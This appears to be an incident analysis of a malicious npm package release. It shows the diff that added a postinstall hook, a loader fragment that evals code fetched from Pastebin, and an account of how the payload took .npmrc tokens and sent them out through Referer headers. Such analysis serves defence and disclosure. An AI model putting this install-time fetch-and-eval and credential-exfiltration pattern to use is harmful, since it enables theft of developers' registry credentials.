The attacker modified package.json
in both [email protected]
and [email protected]
, adding a postinstall
script to run build.js
.
{
+ "postinstall": "node ./lib/build.js",
}
This script downloads another script from Pastebin and eval
s its contents.
Some people have reported that this code has an issue:
r.on("data", c => {
eval(c);
});
Because it doesn't wait for the request to complete, it is possible for the reqeuest to only send part of the script and the eval
call to fail with a SyntaxError
, which is how the issue was discovered.
pastebin (https://pastebin.com/XLeVP82h, taken down)
The script extracts the _authToken
from a user's .npmrc
and sends it to histats
and statcounter
inside the Referer
header.
While everyone is reporting this snippet captures authtokens for npmjs.com, it actually steals the complete content of someones npmrc because of the poor replacement/regex skills of this attacker, even though it's clear he/she expects npmjs.com tokens.
This means that credentials for private npm repositories are being confiscated as well!